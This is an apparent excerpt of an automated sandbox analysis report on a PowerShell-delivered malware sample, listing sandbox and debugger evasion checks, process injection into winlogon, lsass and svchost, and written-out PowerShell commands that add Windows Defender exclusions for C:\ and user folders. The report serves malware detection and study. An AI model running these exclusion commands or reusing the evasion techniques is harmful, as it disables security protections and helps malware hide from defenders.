        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Contains functionality to compare user and computer (likely to detect sandboxes)
        Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,28_2_00000001400010C0
        Tries to evade debugger and weak emulator (self modifying code)
        Source: C:\Users\user\AppData\Roaming\LB311.exeSpecial instruction interceptor: First address: 7FF62EF86D85 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Roaming\LB311.exeSpecial instruction interceptor: First address: 7FF62EC4D3D8 instructions caused by: Self-modifying code
        Source: C:\ProgramData\Mig\Mig.exeSpecial instruction interceptor: First address: 7FF746B26D85 instructions caused by: Self-modifying code
        Source: C:\ProgramData\Mig\Mig.exeSpecial instruction interceptor: First address: 7FF7467ED3D8 instructions caused by: Self-modifying code
        Source: C:\ProgramData\Mig\Mig.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
        Source: C:\ProgramData\Mig\Mig.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
        Source: C:\ProgramData\Mig\Mig.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5846Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3853Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6401Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3415Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6946Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2487Jump to behavior
        Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1725
        Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 1971
        Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 8028
        Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9890
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 4042
        Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9862
        Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_41-15356
        Source: C:\Windows\System32\dwm.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_45-15087
        Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_44-14941
        Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_35-16946
        Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_28-409
        Source: C:\Windows\System32\lsass.exeAPI coverage: 4.9 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 5.9 %
        Source: C:\Windows\System32\svchost.exeAPI coverage: 4.8 %
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6932Thread sleep time: -5534023222112862s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5940Thread sleep count: 6401 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5604Thread sleep count: 3415 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6100Thread sleep time: -5534023222112862s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1012Thread sleep count: 6946 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5492Thread sleep time: -2767011611056431s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4564Thread sleep count: 2487 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6772Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\dialer.exe TID: 6944Thread sleep count: 1725 > 30
        Source: C:\Windows\System32\dialer.exe TID: 6944Thread sleep time: -172500s >= -30000s
        Source: C:\Windows\System32\winlogon.exe TID: 3580Thread sleep count: 1971 > 30
        Source: C:\Windows\System32\winlogon.exe TID: 3580Thread sleep time: -1971000s >= -30000s
        Source: C:\Windows\System32\winlogon.exe TID: 3580Thread sleep count: 8028 > 30
        Source: C:\Windows\System32\winlogon.exe TID: 3580Thread sleep time: -8028000s >= -30000s
        Source: C:\Windows\System32\lsass.exe TID: 5520Thread sleep count: 9890 > 30
        Source: C:\Windows\System32\lsass.exe TID: 5520Thread sleep time: -9890000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5480Thread sleep count: 4042 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5480Thread sleep time: -4042000s >= -30000s
        Source: C:\Windows\System32\dwm.exe TID: 6200Thread sleep count: 9862 > 30
        Source: C:\Windows\System32\dwm.exe TID: 6200Thread sleep time: -9862000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5596Thread sleep count: 251 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5596Thread sleep time: -251000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1148Thread sleep count: 252 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1148Thread sleep time: -252000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5492Thread sleep count: 253 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5492Thread sleep time: -253000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3676Thread sleep count: 251 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3676Thread sleep time: -251000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5072Thread sleep count: 195 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5072Thread sleep time: -195000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3840Thread sleep count: 254 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3840Thread sleep time: -254000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 2944Thread sleep count: 248 > 30
        Source: C:\Windows\System32\svchost.exe TID: 2944Thread sleep time: -248000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 2796Thread sleep count: 243 > 30
        Source: C:\Windows\System32\svchost.exe TID: 2796Thread sleep time: -243000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1196Thread sleep count: 246 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1196Thread sleep time: -246000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7036Thread sleep count: 241 > 30
        Source: C:\Windows\System32\svchost.exe TID: 7036Thread sleep time: -241000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 1824Thread sleep count: 252 > 30
        Source: C:\Windows\System32\svchost.exe TID: 1824Thread sleep time: -252000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6548Thread sleep count: 251 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6548Thread sleep time: -251000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6204Thread sleep count: 252 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6204Thread sleep time: -252000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5184Thread sleep count: 251 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5184Thread sleep time: -251000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5672Thread sleep count: 79 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5672Thread sleep time: -79000s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
        Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E99175DCE0 FindFirstFileExW,35_2_000002E99175DCE0
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000213BDCEDCE0 FindFirstFileExW,41_2_00000213BDCEDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000158709DDCE0 FindFirstFileExW,44_2_00000158709DDCE0
        Source: C:\Windows\System32\dwm.exeCode function: 45_2_0000026DB16EDCE0 FindFirstFileExW,45_2_0000026DB16EDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002A3F066DCE0 FindFirstFileExW,46_2_000002A3F066DCE0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: powershell.exe, 00000000.00000002.1903377493.0000023D351AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_28-477
        Source: C:\Users\user\AppData\Roaming\LB311.exeSystem information queried: ModuleInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Tries to detect sandboxes and other dynamic analysis tools (window names)
        Source: C:\ProgramData\Mig\Mig.exeOpen window title or class name: regmonclass
        Source: C:\ProgramData\Mig\Mig.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
        Source: C:\ProgramData\Mig\Mig.exeOpen window title or class name: procmon_window_class
        Source: C:\ProgramData\Mig\Mig.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
        Source: C:\ProgramData\Mig\Mig.exeOpen window title or class name: filemonclass
        Source: C:\ProgramData\Mig\Mig.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess queried: DebugObjectHandleJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess queried: DebugPortJump to behavior
        Source: C:\ProgramData\Mig\Mig.exeProcess queried: DebugPort
        Source: C:\ProgramData\Mig\Mig.exeProcess queried: DebugObjectHandle
        Source: C:\ProgramData\Mig\Mig.exeProcess queried: DebugPort
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991766208 IsDebuggerPresent,35_2_000002E991766208
        Source: C:\Windows\System32\dialer.exeCode function: 28_2_00000001400017EC GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,28_2_00000001400017EC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991766218 SetUnhandledExceptionFilter,35_2_000002E991766218
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E99175D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_000002E99175D2A4
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991757D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_000002E991757D90
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000213BDCE7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_00000213BDCE7D90
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000213BDCED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_00000213BDCED2A4
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000213BDCF6218 SetUnhandledExceptionFilter,41_2_00000213BDCF6218
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000158709DD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_00000158709DD2A4
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000158709E6218 SetUnhandledExceptionFilter,44_2_00000158709E6218
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000158709D7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_00000158709D7D90
        Source: C:\Windows\System32\dwm.exeCode function: 45_2_0000026DB16F6218 SetUnhandledExceptionFilter,45_2_0000026DB16F6218
        Source: C:\Windows\System32\dwm.exeCode function: 45_2_0000026DB16ED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_0000026DB16ED2A4
        Source: C:\Windows\System32\dwm.exeCode function: 45_2_0000026DB16E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_0000026DB16E7D90
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002A3F066D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,46_2_000002A3F066D2A4
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002A3F0667D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,46_2_000002A3F0667D90
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002A3F0676218 SetUnhandledExceptionFilter,46_2_000002A3F0676218

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell download and execute
        Source: Yara matchFile source: GO.png.ps1, type: SAMPLE
        Source: Yara matchFile source: amsi64_5328.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5328, type: MEMORYSTR
        Adds a directory exclusion to Windows Defender
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
        Allocates memory in foreign processes
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 2E991720000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 213BDCB0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 158709A0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 26DB16B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A3EFFC0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2C9AFB80000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2C06F7B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2917C380000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22382750000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28A1B1D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1486AD40000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24BD3CA0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FA73D30000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CD021B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 269B9FD0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22054D80000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27C57DA0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A333B40000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F174530000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23315740000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A9C8540000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1EC212A0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1876D540000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22CD8950000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15104330000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22308E70000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AB19360000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E731800000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A6DD9B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E2FA1C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: D50000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 209D2560000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FC05190000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2AFD1A00000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D6B0FC0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2036E580000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC5C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2480FAC0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2671A930000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2C588F90000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A8857C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 174DEDC0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 282A2110000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DA09D90000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 287FBEC0000 protect: page execute and read and write
